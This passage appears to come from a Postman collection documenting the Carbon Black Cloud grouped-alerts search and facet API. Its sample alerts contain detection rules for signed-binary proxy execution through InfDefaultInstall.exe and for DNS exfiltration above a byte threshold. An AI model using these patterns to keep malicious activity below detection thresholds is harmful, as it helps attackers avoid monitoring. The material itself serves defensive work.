],\n    \"parent_username\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_guid\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_sha256\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_md5\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_effective_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_username\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_cmdline\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_port\": [\n      &lt;integer&gt;\n    ],\n    \"netconn_local_port\": [\n      &lt;integer&gt;\n    ],\n    \"netconn_protocol\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_domain\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_ip\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_local_ip\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_ipv4\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_local_ipv4\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_ipv6\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_local_ipv6\": [\n      \"&lt;string&gt;\"\n    ],\n    \"threat_category\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ttps\": [\n      \"&lt;string&gt;\"\n    ],\n    \"attack_tactic\": [\n      \"&lt;string&gt;\"\n    ],\n    \"attack_technique\": [\n      \"&lt;string&gt;\"\n    ],\n    \"report_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"report_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"report_link\": [\n      \"&lt;string&gt;\"\n    ],\n    \"watchlists_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"watchlists_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"k8s_policy_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"k8s_policy\": [\n      \"&lt;string&gt;\"\n    ],\n    \"k8s_rule_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"k8s_rule\": [\n      \"&lt;string&gt;\"\n    ],\n    \"cluster_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"namespace\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workload_kind\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workload_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"replica_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"connection_type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"egress_group_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"egress_group_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ip_reputation\": [\n      &lt;integer&gt;\n    ],\n    \"remote_is_private\": &lt;boolean&gt;,\n    \"remote_namespace\": [\n      \"&lt;string&gt;\"\n    ],\n    \"remote_replica_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"remote_workload_kind\": [\n      \"&lt;string&gt;\"\n    ],\n    \"remote_workload_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"tms_rule_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"threat_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"vendor_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"vendor_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"product_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"product_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"external_device_friendly_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"serial_number\": [\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_sha256\": [\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_md5\": [\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_effective_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ml_classification_final_verdict\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ml_classification_global_prevalence\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ml_classification_org_prevalence\": [\n      \"&lt;string&gt;\"\n    ],\n    \"mdr_alert\": &lt;boolean&gt;,\n    \"mdr_workflow_status\": [\n      \"&lt;string&gt;\"\n    ],\n    \"mdr_workflow_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"mdr_workflow_is_assigned\": &lt;boolean&gt;,\n    \"mdr_determination_value\": [\n      \"&lt;string&gt;\"\n    ],\n    \"mdr_determination_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    }\n  },\n  \"start\": &lt;long&gt;,\n  \"rows\": &lt;long&gt;,\n  \"sort\": [\n    {\n      \"field\": \"&lt;string&gt;\",\n      \"order\": \"DESC\"\n    },\n    {\n      \"field\": \"&lt;string&gt;\",\n      \"order\": \"DESC\"\n    }\n  ]\n}\n\n\n</code></pre>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","alerts","v7","orgs","{{cb_org_key}}","grouped_alerts","_search"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"247dec47-40de-49d6-8163-84670dc9c1a4","name":"Find Alerts - Grouped","originalRequest":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"group_by\": {\n        \"field\": \"THREAT_ID\"\n    },\n    \"time_range\": {\n        \"range\": \"-10d\"\n    },\n    \"criteria\": {\n        \"type\": [\n            \"WATCHLIST\"\n        ],\n        \"minimum_severity\": \"1\"\n    },\n    \"rows\":2,\n    \"sort\": [\n        {\n            \"field\": \"count\",\n            \"order\": \"DESC\"\n        }\n    ]\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/api/alerts/v7/orgs/{{cb_org_key}}/grouped_alerts/_search"},"status":"OK","code":200,"_postman_previewlanguage":"Text","header":[{"key":"Date","value":"Mon, 17 Apr 2023 17:39:32 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Transfer-Encoding","value":"chunked"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Content-Encoding","value":"br"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Set-Cookie","value":"JSESSIONID=1D6712A868F0A9725B259AD1FC3A6561; Path=/api/alerts; Secure; HttpOnly"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"num_found\": 8,\n    \"num_available\": 8,\n    \"results\": [\n        {\n            \"count\": 1158,\n            \"workflow_states\": {\n                \"IN_PROGRESS\": 673,\n                \"OPEN\": 484,\n                \"CLOSED\": 1\n            },\n            \"determination_values\": {\n                \"NONE\": 674\n            },\n            \"ml_classification_final_verdicts\": {\n                \"NOT_ANOMALOUS\": 1026,\n                \"NOT_CLASSIFIED\": 132\n            },\n            \"first_alert_timestamp\": \"2023-04-07T19:21:23.978Z\",\n            \"last_alert_timestamp\": \"2023-04-17T17:22:31.613Z\",\n            \"highest_severity\": 8,\n            \"policy_applied\": true,\n            \"threat_notes_present\": false,\n            \"tags\": [\n                \"demo_tag\"\n            ],\n            \"device_count\": 9,\n            \"workload_count\": 0,\n            \"most_recent_alert\": {\n                \"org_key\": \"ABCD1234\",\n                \"alert_url\": \"https://defense.conferdeploy.net/alerts?s[c][query_string]=id:df2b1916-4a62-4796-86af-88667c043d06&orgKey=ABCD1234\",\n                \"id\": \"df2b1916-4a62-4796-86af-88667c043d06\",\n                \"type\": \"WATCHLIST\",\n                \"backend_timestamp\": \"2023-04-17T17:28:42.376Z\",\n                \"user_update_timestamp\": null,\n                \"backend_update_timestamp\": \"2023-04-17T17:28:42.376Z\",\n                \"detection_timestamp\": \"2023-04-17T17:25:48.667Z\",\n                \"first_event_timestamp\": \"2023-04-17T17:22:31.613Z\",\n                \"last_event_timestamp\": \"2023-04-17T17:22:31.613Z\",\n                \"category\": \"THREAT\",\n                \"severity\": 8,\n                \"reason\": \"Process infdefaultinstall.exe was detected by the report \\\"Defense Evasion - Signed Binary Proxy Execution - InfDefaultInstall\\\" in 6 watchlists\",\n                \"reason_code\": \"05696200-88e6-3691-a1e3-8d9a64dbc24e:7828aec8-8502-3a43-ae68-41b5050dab5b\",\n                \"threat_id\": \"0569620088E6669121E38D9A64DBC24E\",\n                \"primary_event_id\": \"0uYYJLu3TpuhPPaL7qehKA-0\",\n                \"policy_applied\": \"NOT_APPLIED\",\n                \"run_state\": \"RAN\",\n                \"sensor_action\": \"ALLOW\",\n                \"workflow\": {\n                    \"change_timestamp\": \"2023-04-17T17:28:42.376Z\",\n                    \"changed_by_type\": \"SYSTEM\",\n                    \"changed_by\": \"ALERT_CREATION\",\n                    \"closure_reason\": \"NO_REASON\",\n                    \"status\": \"OPEN\"\n                },\n                \"determination\": null,\n                \"tags\": [\n                    \"demo_tag\"\n                ],\n                \"alert_notes_present\": false,\n                \"threat_notes_present\": false,\n                \"is_updated\": false,\n                \"device_id\": 12345678,\n                \"device_name\": \"DEMO_MACHINE\",\n                \"device_uem_id\": \"\",\n                \"device_target_value\": \"MEDIUM\",\n                \"device_policy\": \"Demo Policy\",\n                \"device_policy_id\": 98765432,\n                \"device_os\": \"WINDOWS\",\n                \"device_os_version\": \"Windows 10 x64 SP: 1\",\n                \"device_username\": \"demouser@demoorg.com\",\n                \"device_location\": \"UNKNOWN\",\n                \"device_external_ip\": \"1.2.3.4\",\n                \"mdr_alert\": false,\n                \"report_id\": \"oJFtoawGS92fVMXlELC1Ow-b4ee93fc-ec58-436a-a940-b4d33a613513\",\n                \"report_name\": \"Defense Evasion - Signed Binary Proxy Execution - InfDefaultInstall\",\n                \"report_description\": \"\\n\\nThreat:\\nThis behavior may be abused by adversaries to execute malicious files that could bypass application whitelisting and signature validation on systems.\\n\\nFalse Positives:\\nSome environments may legitimate use this, but should be rare.\\n\\nScore:\\n85\",\n                \"report_tags\": [\n                    \"attack\",\n                    \"attackframework\",\n                    \"threathunting\"\n                ],\n                \"report_link\": \"https://attack.mitre.org/wiki/Technique/T1218\",\n                \"ioc_id\": \"b4ee93fc-ec58-436a-a940-b4d33a613513-0\",\n                \"ioc_hit\": \"((process_name:InfDefaultInstall.exe)) -enriched:true\",\n                \"watchlists\": [\n                    {\n                        \"id\": \"9x0timurQkqP7FBKX4XrUw\",\n                        \"name\": \"Carbon Black Advanced Threats\"\n                    }\n                ],\n                \"process_guid\": \"ABCD1234-01147626-00011e57-00000000-19db1ded53e8000\",\n                \"process_pid\": 73303,\n                \"process_name\": \"infdefaultinstall.exe\",\n                \"process_sha256\": \"1a23456b7890c458f804e5d0fe925a9f55cf016733458c58c1980addc44cd774\",\n                \"process_md5\": \"12ab34567c49f13193513b0138f72a9\",\n                \"process_effective_reputation\": \"LOCAL_WHITE\",\n                \"process_reputation\": \"NOT_LISTED\",\n                \"process_cmdline\": \"InfDefaultInstall.exe C:\\\\Users\\\\userdir\\\\Infdefaultinstall.inf\",\n                \"process_username\": \"DEMO\\\\DEMOUSER\",\n                \"process_signatures\": [\n                    {\n                        \"certificate_authority\": \"Demo Code Signing CA\",\n                        \"publisher\": \"Demo Test Authority\"\n                    }\n                ],\n                \"childproc_guid\": \"\",\n                \"childproc_username\": \"\",\n                \"childproc_cmdline\": \"\",\n                \"ml_classification_final_verdict\": \"NOT_ANOMALOUS\",\n                \"ml_classification_global_prevalence\": \"LOW\",\n                \"ml_classification_org_prevalence\": \"LOW\"\n            }\n        },\n        {\n            \"count\": 36,\n            \"workflow_states\": {\n                \"IN_PROGRESS\": 36\n            },\n            \"determination_values\": {\n                \"NONE\": 36\n            },\n            \"ml_classification_final_verdicts\": {},\n            \"first_alert_timestamp\": \"2023-04-07T19:12:45.170Z\",\n            \"last_alert_timestamp\": \"2023-04-12T15:36:39.983Z\",\n            \"highest_severity\": 6,\n            \"policy_applied\": true,\n            \"threat_notes_present\": false,\n            \"tags\": [],\n            \"device_count\": 3,\n            \"workload_count\": 0,\n            \"most_recent_alert\": {\n                \"org_key\": \"EWRTY2PK\",\n                \"alert_url\": \"https:///defense.conferdeploy.net/alerts?s[c][query_string]=id:90c0a086-0164-49aa-82a6-725aa3f04b930&orgKey=ABCD1234\",\n                \"id\": \"90c0a086-0164-49aa-82a6-725aa304b930\",\n                \"type\": \"WATCHLIST\",\n                \"backend_timestamp\": \"2023-04-12T15:41:22.556Z\",\n                \"user_update_timestamp\": \"2023-04-13T11:55:24.624Z\",\n                \"backend_update_timestamp\": \"2023-04-12T15:41:22.556Z\",\n                \"detection_timestamp\": \"2023-04-12T15:39:50.963Z\",\n                \"first_event_timestamp\": \"2023-04-12T15:36:39.983Z\",\n                \"last_event_timestamp\": \"2023-04-12T15:36:39.983Z\",\n                \"category\": \"THREAT\",\n                \"severity\": 6,\n                \"reason\": \"Process SYSTEM was detected by the report \\\"Abnormally Large DNS Exchanges (exfil or zone transfer)\\\" in watchlist \\\"zzz_XDR Sample IOCs\\\"\",\n                \"reason_code\": \"19261158-dbbf-3077-9959-f8aa7f7551a1:0cc402b0-ea96-35c6-8418-a2f07acf616d\",\n                \"threat_id\": \"19261158DBBF00775959F8AA7F7551A1\",\n                \"primary_event_id\": \"nPnYST6MS6ON4IvF5FkWSQ-0\",\n                \"policy_applied\": \"NOT_APPLIED\",\n                \"run_state\": \"RAN\",\n                \"sensor_action\": \"ALLOW\",\n                \"workflow\": {\n                    \"change_timestamp\": \"2023-04-13T11:55:24.624Z\",\n                    \"changed_by_type\": \"USER\",\n                    \"changed_by\": \"demouser@demoorg.com\",\n                    \"closure_reason\": \"NO_REASON\",\n                    \"status\": \"IN_PROGRESS\"\n                },\n                \"determination\": {\n                    \"change_timestamp\": \"1970-01-01T00:00:00.000Z\",\n                    \"value\": \"NONE\",\n                    \"changed_by_type\": \"OPERATOR_UNKNOWN\",\n                    \"changed_by\": null\n                },\n                \"tags\": null,\n                \"alert_notes_present\": false,\n                \"threat_notes_present\": false,\n                \"is_updated\": false,\n                \"device_id\": 18078555,\n                \"device_name\": \"DEMO\\\\DEMO_MACHINE\",\n                \"device_uem_id\": \"\",\n                \"device_target_value\": \"MEDIUM\",\n                \"device_policy\": \"Other Demo Policy\",\n                \"device_policy_id\": 2468013,\n                \"device_os\": \"WINDOWS\",\n                \"device_os_version\": \"Windows 10 x64\",\n                \"device_username\": \"DEMO\\\\DEMO_USER\",\n                \"device_location\": \"UNKNOWN\",\n                \"device_external_ip\": \"1.2.3.4\",\n                \"device_internal_ip\": \"5.6.7.8\",\n                \"mdr_alert\": false,\n                \"report_id\": \"Fm0YsPDyQ1Kp1Pdd6Lnd8w-dns_exfil_1\",\n                \"report_name\": \"Abnormally Large DNS Exchanges (exfil or zone transfer)\",\n                \"report_description\": \"IOC leveraging XDR fields to identify abnormally large DNS exchanges. The typical client DNS query to your DNS server is between 50-550 bytes. Large exchanges could be indicative of attack exfiltration or zone transfer attempts.\",\n                \"report_tags\": [],\n                \"ioc_id\": \"dns_exfil_1\",\n                \"ioc_hit\": \"netconn_application_protocol:DNS AND netconn_bytes_sent:[551 TO *]\",\n                \"watchlists\": [\n                    {\n                        \"id\": \"lgaClyOmQ86ZwZttq3ZDxg\",\n                        \"name\": \"Demo Watchlist\"\n                    }\n                ],\n                \"process_guid\": \"ABCD1234-0113db5b-00000004-00000000-1d94225edd70bfd\",\n                \"process_pid\": 4,\n                \"process_name\": \"SYSTEM\",\n                \"process_sha256\": \"\",\n                \"process_md5\": \"\",\n                \"process_effective_reputation\": \"RESOLVING\",\n                \"process_reputation\": \"RESOLVING\",\n                \"process_cmdline\": \"\",\n                \"process_username\": \"DEMO\\\\DEMOUSER\",\n                \"process_signatures\": [],\n                \"childproc_guid\": \"\",\n                \"childproc_username\": \"\",\n                \"childproc_cmdline\": \"\"\n            }\n        }\n    ],\n    \"group_by_total_count\": 1224\n}"}],"_postman_id":"0c7c42e7-bc6e-4680-ab92-881ff4477488"},{"name":"Facet Alerts - Grouped","id":"f4df2d0e-1ccc-4b31-ac0d-4f5ba0e48323","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"group_by\": {\n        \"field\": \"THREAT_ID\"\n    },\n    \"terms\": {\n        \"fields\": [\n            \"type\",\n            \"THREAT_ID\"\n        ],\n        \"rows\": 3\n    },\n    \"criteria\": {\n        \"minimum_severity\": \"3\"\n    },\n    \"exclusions\": {\n        \"type\": [\n            \"HOST_BASED_FIREWALL\",\n            \"CONTAINER_RUNTIME\"\n        ]\n    },\n    \"filter_values\": true\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/api/alerts/v7/orgs/{{cb_org_key}}/grouped_alerts/_facet","description":"<p>Find facets for alerts that are grouped by Threat Id.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.alerts</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p>See complete Alerts API documentation <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/alerts-api\">here</a></p>\n<h3 id=\"body-schema\">Body Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"group_by\": {\n    \"field\": \"THREAT_ID\"\n  },\n  \"terms\": {\n    \"fields\": [\n      \"CHILDPROC_EFFECTIVE_REPUTATION\",\n      \"SLO_TIME_RANGE\"\n    ],\n    \"rows\": \"&lt;integer&gt;\"\n  },\n  \"query\": \"&lt;string&gt;\",\n  \"time_range\": {\n    \"start\": \"&lt;dateTime&gt;\",\n    \"end\": \"&lt;dateTime&gt;\",\n    \"range\": \"&lt;string&gt;\"\n  },\n  \"criteria\": {\n    \"org_key\": [\n      \"&lt;string&gt;\"\n    ],\n    \"id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"type\": [\n      \"HOST_BASED_FIREWALL\",\n      \"DEVICE_CONTROL\"\n    ],\n    \"backend_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"user_update_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"backend_update_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"detection_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"first_event_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"last_event_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"category\": [\n      \"MONITORED\"\n    ],\n    \"minimum_severity\": \"&lt;integer&gt;\",\n    \"reason_code\": [\n      \"&lt;string&gt;\"\n    ],\n    \"threat_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"primary_event_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"policy_applied\": [\n      \"NOT_APPLIED\"\n    ],\n    \"run_state\": [\n      \"UNKNOWN\"\n    ],\n    \"sensor_action\": [\n      \"ALLOW\",\n      \"TERMINATE\"\n    ],\n    \"workflow_status\": [\n      \"CLOSED\",\n      \"OPEN\"\n    ],\n    \"workflow_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"workflow_changed_by_type\": [\n      \"API\"\n    ],\n    \"workflow_changed_by_autoclose_rule_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workflow_closure_reason\": [\n      \"&lt;string&gt;\"\n    ],\n    \"determination_value\": [\n      \"FALSE_POSITIVE\",\n      \"NONE\"\n    ],\n    \"determination_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"determination_changed_by_type\": [\n      \"ML\",\n      \"API\"\n    ],\n    \"tags\": [\n      \"&lt;string&gt;\"\n    ],\n    \"alert_notes_present\": \"&lt;boolean&gt;\",\n    \"threat_notes_present\": \"&lt;boolean&gt;\",\n    \"device_id\": [\n      \"&lt;long&gt;\"\n    ],\n    \"device_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_uem_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_policy\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_policy_id\": [\n      \"&lt;long&gt;\"\n    ],\n    \"device_target_value\": [\n      \"MISSION_CRITICAL\",\n      \"HIGH\"\n    ],\n    \"device_os\": [\n      \"LINUX\"\n    ],\n    \"device_os_version\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_username\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_location\": [\n      \"ONSITE\",\n      \"OFFSITE\"\n    ],\n    \"device_external_ip\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_internal_ip\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_config_type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_config_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_config_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_category_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_guid\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_pid\": [\n      \"&lt;integer&gt;\"\n    ],\n    \"process_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_sha256\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_md5\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_effective_reputation\": [\n      \"KNOWN_MALWARE\",\n      \"RESOLVING\"\n    ],\n    \"process_reputation\": [\n      \"NOT_LISTED\",\n      \"PUP\"\n    ],\n    \"process_cmdline\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_username\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_signatures_certificate_authority\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_signatures_publisher\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_guid\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_pid\": [\n      \"&lt;integer&gt;\"\n    ],\n    \"parent_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_sha256\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_md5\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_effective_reputation\": [\n      \"NOT_LISTED\",\n      \"PUP\"\n    ],\n    \"parent_reputation\": [\n      \"PUP\",\n      \"GRAY_OBSOLETE\"\n    ],\n    \"parent_cmdline\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_username\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_guid\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_sha256\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_md5\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_effective_reputation\": [\n      \"DLP_OBSOLETE\",\n      \"GRAY_OBSOLETE\"\n    ],\n    \"childproc_username\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_cmdline\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_port\": [\n      \"&lt;integer&gt;\"\n    ],\n    \"netconn_local_port\": [\n      \"&lt;integer&gt;\"\n    ],\n    \"netconn_protocol\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_domain\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_ip\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_local_ip\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_ipv4\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_local_ipv4\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_ipv6\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_local_ipv6\": [\n      \"&lt;string&gt;\"\n    ],\n    \"threat_category\": [\n      \"NON_MALWARE\",\n      \"UNKNOWN\"\n    ],\n    \"ttps\": [\n      \"&lt;string&gt;\"\n    ],\n    \"attack_tactic\": [\n      \"&lt;string&gt;\"\n    ],\n    \"attack_technique\": [\n      \"&lt;string&gt;\"\n    ],\n    \"report_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"report_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"report_link\": [\n      \"&lt;string&gt;\"\n    ],\n    \"watchlists_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"watchlists_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"k8s_policy_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"k8s_policy\": [\n      \"&lt;string&gt;\"\n    ],\n    \"k8s_rule_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"k8s_rule\": [\n      \"&lt;string&gt;\"\n    ],\n    \"cluster_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"namespace\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workload_kind\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workload_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"replica_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"connection_type\": [\n      \"INTERNAL_INBOUND\",\n      \"INGRESS\"\n    ],\n    \"egress_group_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"egress_group_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ip_reputation\": [\n      \"&lt;integer&gt;\"\n    ],\n    \"remote_is_private\": \"&lt;boolean&gt;\",\n    \"remote_namespace\": [\n      \"&lt;string&gt;\"\n    ],\n    \"remote_replica_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"remote_workload_kind\": [\n      \"&lt;string&gt;\"\n    ],\n    \"remote_workload_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"tms_rule_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"threat_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"vendor_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"vendor_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"product_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"product_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"external_device_friendly_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"serial_number\": [\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_sha256\": [\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_md5\": [\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_effective_reputation\": [\n      \"HEURISTIC\",\n      \"NOT_LISTED\"\n    ],\n    \"ml_classification_final_verdict\": [\n      \"NOT_CLASSIFIED\"\n    ],\n    \"ml_classification_global_prevalence\": [\n      \"HIGH\",\n      \"LOW\"\n    ],\n    \"ml_classification_org_prevalence\": [\n      \"LOW\",\n      \"LOW\"\n    ],\n    \"mdr_alert\": \"&lt;boolean&gt;\",\n    \"mdr_workflow_status\": [\n      \"RESPONSE_RECEIVED\",\n      \"IN_PROGRESS\"\n    ],\n    \"mdr_workflow_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"mdr_workflow_is_assigned\": \"&lt;boolean&gt;\",\n    \"mdr_determination_value\": [\n      \"NONE\",\n      \"NOT_REVIEWED\"\n    ],\n    \"mdr_determination_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"mdr_alert_notes_present\": \"&lt;boolean&gt;\",\n    \"mdr_threat_notes_present\": \"&lt;boolean&gt;\"\n  },\n  \"exclusions\": {\n    \"org_key\": [\n      \"&lt;string&gt;\"\n    ],\n    \"id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"type\": [\n      \"HOST_BASED_FIREWALL\",\n      \"CONTAINER_RUNTIME\"\n    ],\n    \"backend_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": 